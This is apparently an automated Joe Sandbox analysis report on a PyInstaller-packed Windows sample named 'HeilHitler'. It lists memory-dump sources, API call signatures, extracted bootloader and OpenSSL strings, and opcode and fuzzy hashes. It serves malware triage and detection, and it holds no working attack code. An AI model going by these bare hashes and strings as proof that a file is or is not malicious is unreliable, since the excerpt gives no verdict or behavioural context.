• String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
• API String ID: 2776309574-3273434969
• Opcode ID: 4651f0dbc160d0404dcf25292df1705b0130bb44d3f559e05366d82f1582b67c
• Instruction ID: 0eb346d6c770e15e92253ca69477e5e7d831923dfad77cb800914853cad8e879
• Opcode Fuzzy Hash: 4651f0dbc160d0404dcf25292df1705b0130bb44d3f559e05366d82f1582b67c
• Instruction Fuzzy Hash: 0432AC21A0C68291FB15DBA494573B973A1AF44780FC44236DA6DE77E6EF2CF558E300
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: $..\s\ssl\record\ssl3_record.c$@$CONNE$GET $HEAD $POST $PUT
                                                                                                                                                                                                                                            • API String ID: 0-352295518
                                                                                                                                                                                                                                            • Opcode ID: e537590e1e3e5565111220064509cd7ea415ff27cb0e8e47a5c26d5efe5f4d10
                                                                                                                                                                                                                                            • Instruction ID: 4b0e81c33a936e114dba6ba8a3ba8c362d7122d0e71fff0dee5fa4018bf3da85
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e537590e1e3e5565111220064509cd7ea415ff27cb0e8e47a5c26d5efe5f4d10
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78728132B0874286FB68AE15D464BB937A0EB48B8CF944175DA6E4B6DCDF7ED580C700

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
• Instruction ID: 89c632f8cecc42cd5d3a3afa7ff96505a68fc3a8e9bccf3b8a24fbe497977bd1
• Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
• Instruction Fuzzy Hash: 14C1AF36B28A4585EB11CFA9C4926AC3761FB49BA8B015335DF2EAB7D4DF38E055D300
APIs
Memory Dump Source
• Source File: 00000001.00000002.2035725372.00007FFDFB293000.00000080.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
• Associated: 00000001.00000002.2034579485.00007FFDFAF40000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFAF4D000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFAFA5000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFAFB9000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFAFC9000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFAFDD000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB18C000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB1B9000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB1EA000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB25E000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB264000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB266000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB282000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB28F000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
Similarity
• API ID: ProtectVirtual$AddressLibraryLoadProc
• String ID:
• API String ID: 3300690313-0
• Opcode ID: 6912a145b092a435b2690e8e050799ca64382d8315b3fc9a28e3f91c66e0900d
• Instruction ID: f9cd50aa36f4ee6677f142606f9a0cf833233c713b44547ec1d11bd06bff8273
• Opcode Fuzzy Hash: 6912a145b092a435b2690e8e050799ca64382d8315b3fc9a28e3f91c66e0900d
• Instruction Fuzzy Hash: FA62372272959286E7198F38D49077D77A0F748789F045632EABEC37D8EA3CEA44D700
APIs
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
• Instruction ID: c398fd0573cd36a510ed8dd3cff5e559f13ae2d8f5793ff5aa1c63212eee7f96
• Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
• Instruction Fuzzy Hash: 75F0C832A1874186F7A08FA0B49A7667350BB84328F840335D97F567D4DF3CD058DB00

Control-flow Graph
APIs
  • Part of subcall function 00007FF633D67F90: _fread_nolock.LIBCMT ref: 00007FF633D6803A
• _fread_nolock.LIBCMT ref: 00007FF633D61A1B
  • Part of subcall function 00007FF633D62910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF633D61B6A), ref: 00007FF633D6295E
Strings
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: _fread_nolock$CurrentProcess
• String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
• API String ID: 2397952137-3497178890
• Opcode ID: ee3080450604db9b79bcaf6ea9780d01564dfb64de786eed8711188a6f6cabc7
• Instruction ID: 1855953544a3383a96094cab659c93698b37e88630c9d79497d49a2ddd2127ab
• Opcode Fuzzy Hash: ee3080450604db9b79bcaf6ea9780d01564dfb64de786eed8711188a6f6cabc7
• Instruction Fuzzy Hash: 0C81C371A0C68286EB20DBA4D0532FD73A0FF88784F844635E99DE7795DE3CE585A740

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
• Opcode ID: 36c27e05a3dc08856ce095ca55667838a030721a896d1c10063586a41b75456c
• Instruction ID: d4d2e6fea381ba84e704f53d4ba53531d05f7e933aa213446e06bfb832ffe5c8
• Opcode Fuzzy Hash: 36c27e05a3dc08856ce095ca55667838a030721a896d1c10063586a41b75456c
• Instruction Fuzzy Hash: E241A031A0864286EB10DFA1D4125B9B3A0FF44794F844A32EDADA7B95DE3CE546A704

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: CurrentProcess
• String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
• API String ID: 2050909247-2813020118
• Opcode ID: 01d38e4bc7406ff039fcd5bb421c60dd86912a0bfc5eaad0c764dc15b84283c8
• Instruction ID: d5e919ad1cdf2258e930a2683505d67dca29f55f9e989f0f3a5ac0180549bd08
• Opcode Fuzzy Hash: 01d38e4bc7406ff039fcd5bb421c60dd86912a0bfc5eaad0c764dc15b84283c8
• Instruction Fuzzy Hash: 6251F822A0864285EA209F91E4523BA7390FF85794F844335ED9EE77D5EF3CE545E700

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32(?,00007FF633D63804), ref: 00007FF633D636E1
• GetLastError.KERNEL32(?,00007FF633D63804), ref: 00007FF633D636EB
  • Part of subcall function 00007FF633D62C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF633D63706,?,00007FF633D63804), ref: 00007FF633D62C9E
  • Part of subcall function 00007FF633D62C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF633D63706,?,00007FF633D63804), ref: 00007FF633D62D63
  • Part of subcall function 00007FF633D62C50: MessageBoxW.USER32 ref: 00007FF633D62D99
Strings
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
• String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
• API String ID: 3187769757-2863816727
• Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
• Instruction ID: c13f2a38a5be17a066d117a47e39e6235b7b3cb1b116aea74476be53e48fcbf7
• Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
• Instruction Fuzzy Hash: 56217161F1864281FB609BA4E8573B67290BF88354FC01332E56EE77E5EE2CE505E700

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
• Instruction ID: 41e7c414f1f24851d6bd88147b24f59ed5fc926e818fa220cb428853ac172b60
• Opcode Fuzzy Hash: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
• Instruction Fuzzy Hash: 9DC12922A1CB8781E7619F9590462BD7B60FF81B90F594331EA8EA3791CF7CE845A700

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
• API String ID: 2050909247-2434346643
• Opcode ID: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
• Instruction ID: 1349cc8312471161d2379808559c6e6d0b30e26a3d080edb85694fb6660dab5b
• Opcode Fuzzy Hash: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
• Instruction Fuzzy Hash: 1E417131A1DA8691EA21DBA4E4162E97361FF44344FC00332EA6DA7795EF3CF519D740

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: CloseCreateFileHandle_invalid_parameter_noinfo
• String ID:
• API String ID: 1279662727-0
• Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
• Instruction ID: b6ea347872c606fc651df10970017495f6d5f098589fa492bb20860db60ab8b2
• Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
• Instruction Fuzzy Hash: EB41AF22E1878283E7508FA095123BD7361FB947A4F109335EAAC97BD2DF7CA5E19701

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
• String ID:
• API String ID: 3251591375-0
• Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
• Instruction ID: 225631809ee873c906d65c0a2f884c8556d03b12ba005d688212f58f9edddcff
• Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
• Instruction Fuzzy Hash: 6E315D21E0C14745FA14ABE5A4533B93691AF41784F845734EA2EFB3E7DE6CB804E710
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
• Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
Similarity
• API ID: ErrorLast
• String ID: ..\s\ssl\statem\statem.c
• API String ID: 1452528299-2512360314
• Opcode ID: ee442aae15e5596c2213ec8fd07130747ec22657d04e437eb1166b1a36e472a3
• Instruction ID: d36fa133e8e828faadf3903ce80365cd8f60af7a27346b2b12d904cbc34d355d
• Opcode Fuzzy Hash: ee442aae15e5596c2213ec8fd07130747ec22657d04e437eb1166b1a36e472a3
• Instruction Fuzzy Hash: 90B19172B0824286E76AAF25C460B7A33E1EF40B48F1555B5DA6E476DDDF3EE884C700
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
• Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                                            • String ID: ..\s\ssl\record\rec_layer_s3.c
                                                                                                                                                                                                                                            • API String ID: 1452528299-2209325370
                                                                                                                                                                                                                                            • Opcode ID: 2f069f0debedb460f97cf309107711c0ac6c72eae5d4146433fa6f897ae7624f
                                                                                                                                                                                                                                            • Instruction ID: 416900013d54c14aa5027054142ba82e30f9f373858a7fb9fc9b80d35ba719a0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f069f0debedb460f97cf309107711c0ac6c72eae5d4146433fa6f897ae7624f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14819131B08A8185EB59AF25D4A4BB96391FB40B98F148175DD6E0B7CCDF3AD44AC340
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                            • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                            • Instruction ID: fc5356c7eb802d985e62e58080e3a4ed0cc3ff611ae5dba2789b26f0a536a27a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A512422B0925286FB289EF5A40267A6691BF84BB4F184734DE7DE77D5CE3CE401A600
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                                            • String ID: ..\s\ssl\record\rec_layer_s3.c
                                                                                                                                                                                                                                            • API String ID: 1452528299-2209325370
                                                                                                                                                                                                                                            • Opcode ID: 33a6eeb424a59c5021b37bcb26c13c5fca1bb7764044da02c9e52baff78b50a2
                                                                                                                                                                                                                                            • Instruction ID: 6d3ac398ac4c11d49c61d2d6865c5a27b0c21c9c573177bec35ad15ca1f86ff9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 33a6eeb424a59c5021b37bcb26c13c5fca1bb7764044da02c9e52baff78b50a2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A341C132709B4182EB28AF15D490A6973A0FB44B84F148675DB6E0BBDCDF7EE4A5C740
                                                                                                                                                                                                                                            APIs
